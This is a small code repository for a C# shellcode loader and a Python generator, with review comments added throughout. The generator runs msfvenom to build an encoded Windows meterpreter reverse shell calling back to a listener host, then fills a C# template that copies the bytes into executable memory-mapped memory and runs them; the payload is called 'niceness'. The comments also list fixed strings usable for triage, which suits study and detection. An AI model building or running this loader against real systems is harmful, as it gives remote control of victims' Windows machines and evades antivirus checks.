├── README.md
├── niceness_template.cs
└── GenMMNiceness.py

/README.md:
--------------------------------------------------------------------------------
# CsharpMMNiceness
Files for generating a C# source file that allows for memory-mapping "niceness" and then executing said "niceness"

--------------------------------------------------------------------------------
/niceness_template.cs:
--------------------------------------------------------------------------------
////////////////////////////
//
// C# Memory Mapping Template
// Original Template: https://atom0s.com/forums/viewtopic.php?t=178
// Modified By: Brian Fehrman (@fullmetalcache)
// Date Modified: 2018-11-27
//
////////////////////////////

// NOTE(review): what this template does once the generator script fills it in:
//   * creates a named mapping ("__niceness") that has no backing file on disk,
//     requested with MemoryMappedFileAccess.ReadWriteExecute,
//   * writes the generated bytes into the view, one mmva.Write call per byte,
//   * treats the start of the view as a native function and calls it.
// The mapping name, the ReadWriteExecute access on both calls, the /unsafe
// switch and the C:\Users\Public paths in the build comments below are fixed
// text in this file, so they are usable as review and triage strings for
// programs generated from it.

//x64
//C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64/out:C:\Users\Public\prog.exe C:\Users\Public\mmniceness.cs

//x86
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /platform:x86 /out:C:\Users\Public\prog.exe C:\Users\Public\mmniceness.cs

namespace nicenessExample
{
    using System;
    using System.IO.MemoryMappedFiles;
    using System.Runtime.InteropServices;

    class Program
    {
        // Delegate shape used to call the mapped bytes: no arguments, returns IntPtr.
        private delegate IntPtr GetPebDelegate();

        // Builds the executable mapping, fills it, and calls it.
        // Returns whatever the called bytes return, or IntPtr.Zero if anything
        // inside the try block throws.
        // NOTE(review): the GetPeb / GetPebDelegate names look inherited from the
        // original template credited in the header; the bytes actually written
        // come from the generator script, so do not read intent into the name.
        private unsafe static IntPtr GetPeb()
        {

            // Size of the mapping and view; the generator substitutes the byte
            // count for the LENGTH placeholder on the next line.
            const int niceness_length = $$$LENGTH$$$;
            MemoryMappedFile mmf = null;
            MemoryMappedViewAccessor mmva = null;

            try
            {
                // Named mapping held in system memory (CreateNew does not create a
                // file on disk), requested as read + write + execute.
                mmf = MemoryMappedFile.CreateNew("__niceness", niceness_length, MemoryMappedFileAccess.ReadWriteExecute);

                // View over the whole mapping, again read + write + execute.
                mmva = mmf.CreateViewAccessor(0, niceness_length, MemoryMappedFileAccess.ReadWriteExecute);

                // The generator replaces the NICENESS placeholder line below with
                // one mmva.Write(offset, (byte)value) statement per byte.
                $$$NICENESS$$$

                // Raw pointer to the start of the view; this is why the method is
                // marked unsafe and the build lines pass /unsafe.
                // NOTE(review): no matching ReleasePointer call is visible.
                var pointer = (byte*)0;
                mmva.SafeMemoryMappedViewHandle.AcquirePointer(ref pointer);

                // Wrap the view's base address as a managed delegate.
                var func = (GetPebDelegate)Marshal.GetDelegateForFunctionPointer(new IntPtr(pointer), typeof(GetPebDelegate));

                // Control transfers into the mapped bytes here.
                return func();
            }
            catch
            {
                // Any managed exception is swallowed and reported as a zero pointer.
                return IntPtr.Zero;
            }
            finally
            {
                // NOTE(review): mmva and mmf start as null; if CreateNew or
                // CreateViewAccessor throws, these calls dereference null and the
                // finally block itself throws instead of returning IntPtr.Zero.
                mmva.Dispose();
                mmf.Dispose();
            }
        }

        static void Main(string[] args)
        {
            var peb = GetPeb();
            // NOTE(review): IntPtr.ToInt32() throws OverflowException in a 64-bit
            // process when the value does not fit in 32 bits; relevant to the x64
            // build line in the header.
            Console.WriteLine("PEB is located at: {0:X8}", peb.ToInt32());
        }
    }
}

--------------------------------------------------------------------------------
/GenMMNiceness.py:
--------------------------------------------------------------------------------
#example usage: python macropscsgen.py -a x64 -P tcp -l x.x.x.x -p 554
# NOTE(review): the usage line above names macropscsgen.py, but this file is
# listed as GenMMNiceness.py; the options shown match the argparse setup below.
#
# What the script does, in order (see the __main__ block):
#   1. runs msfvenom and has it write its "num"-format output to tmpNicenessFile,
#   2. downloads niceness_template.cs from GitHub,
#   3. writes outputFile: the template with the byte count and one
#      mmva.Write(...) line per byte substituted in.
# Written for Python 2 (urllib2 does not exist in Python 3).

import argparse
# NOTE(review): base64, random, string and the itertools star-import are not
# used by any code visible in this file.
import base64
import subprocess
import urllib2
import random
import string
from itertools import *

# Intermediate msfvenom output; this script never deletes it.
tmpNicenessFile = 'tmpshell.txt'
# Generated C# source, written to the current working directory.
outputFile = 'mmniceness.cs'

def grabCSTemplate():
    """Download the C# template and return its text.

    NOTE(review): the URL points at the `master` branch, so the content is
    whatever that branch holds at run time. Nothing here pins a commit or
    checks a hash, and the downloaded text is written straight into the
    generated source by injectNiceness. The copy of niceness_template.cs
    sitting next to this script is not read.
    """
    response = urllib2.urlopen('https://raw.githubusercontent.com/fullmetalcache/CsharpMMNiceness/master/niceness_template.cs')
    script = response.read()

    return script

def injectNiceness(script, nicenessFile, outfile):
    """Fill the template text and write the result to `outfile`.

    script       -- template text containing the LENGTH and NICENESS placeholders
    nicenessFile -- path of a text file of comma-separated byte tokens
                    (presumably msfvenom's "num" output; nothing here checks)
    outfile      -- path of the C# file to create or overwrite

    Tokens are copied into the C# source as-is; they are not validated as
    byte literals.
    """

    # NOTE(review): fin is never closed, and neither file uses a `with` block.
    fin = open(nicenessFile)
    niceBytes = []
    for line in fin:
        line = line.rstrip()
        bytes_curr = line.split(", ")

        for byte in bytes_curr:
            # Drops a trailing comma left on the last token of a line.
            # NOTE(review): a blank input line yields one empty token here,
            # which would still be counted and written out.
            byte = byte.split(",")[0]
            niceBytes.append(byte)

    fout = open(outfile, 'w')
    scriptLines = script.split("\n")

    for line in scriptLines:
        if '$$$LENGTH$$$' in line:
            # NOTE(review): the template line already ends in ';' after the
            # placeholder, and the replacement adds ";\n", so the output gets
            # an extra ';' on a line of its own (an empty statement in C#).
            line = line.replace('$$$LENGTH$$$', "{0};\n".format(len(niceBytes)))

        elif '$$$NICENESS$$$' in line:
            # The placeholder line itself is blanked; the Write statements
            # are emitted before it, without the template's indentation.
            line = ""

            idx = 0
            for byte in niceBytes:
                fout.write("mmva.Write({0}, ((byte){1}));\n".format(idx, byte))
                idx += 1

        # Every template line (possibly modified above) is written back out.
        fout.write(line + '\n')

    fout.close()

def createNiceness(arch, protocol, lhost, lport, single, outfile):
    """Run msfvenom and have it write its output to `outfile`.

    arch     -- 'x64' selects the x64 payload path and encoder; any other
                value takes the x86 branch
    protocol -- appended to the payload name ('http', 'https' or 'tcp' per
                the argparse choices below)
    lhost    -- listener host, passed through as 'lhost=<value>'
    lport    -- listener port as a string (it is concatenated, not formatted)
    single   -- True selects the single-stage payload name
    outfile  -- path handed to msfvenom's -o option

    The command is passed to subprocess as an argument list, so no shell
    parses lhost/lport; the values are otherwise unvalidated.
    subprocess.check_output raises CalledProcessError on a non-zero exit,
    and the captured output is discarded.
    """
    msfCall = 'msfvenom'
    msfPayload = 'windows/'
    encoder = ''

    if arch == 'x64':
        msfPayload += 'x64/'
        encoder = 'x64/xor'
    else:
        encoder = 'x86/shikata_ga_nai'
    # Single-stage and staged payloads differ only in '_' versus '/' here.
    if single == True:
        msfPayload += 'meterpreter_reverse_' + protocol
    else:
        msfPayload += 'meterpreter/reverse_' + protocol

    msfLhost = 'lhost=' + lhost
    msfLport = 'lport=' + lport

    # "num" is the comma-separated numeric format that injectNiceness parses.
    msfFormat = "num"
    msfOut = outfile

    # Encoder iterations are fixed at 5 via '-i'.
    subprocess.check_output([msfCall, '-p', msfPayload, msfLhost, msfLport, '-f', msfFormat, '-e', encoder, '-i', '5', '-o',msfOut])

if __name__== "__main__":
    # NOTE(review): the description mentions an Office macro, but nothing in
    # this script produces one; its only outputs are tmpNicenessFile and
    # outputFile.
    parser = argparse.ArgumentParser(description='Generate Office Macro that writes, compiles, and runs a C# shell code program')

    parser.add_argument('-a', '--arch', choices=['x86', 'x64'], required=True, help='Target Architecture')
    parser.add_argument('-P', '--protocol', choices=['http', 'https', 'tcp'], required=True, help='Payload protocol')
    parser.add_argument('-l', '--lhost', required=True, help='Listener Host')
    parser.add_argument('-p', '--lport', required=True, help='Listener Port')
    parser.add_argument('-s', '--single', action='store_true', help='Use a single-stage payload')
    args = parser.parse_args()

    # Order matters: the byte file must exist before the template is filled.
    createNiceness( args.arch, args.protocol, args.lhost, args.lport, args.single, tmpNicenessFile )
    template = grabCSTemplate()
    injectNiceness( template, tmpNicenessFile, outputFile )

--------------------------------------------------------------------------------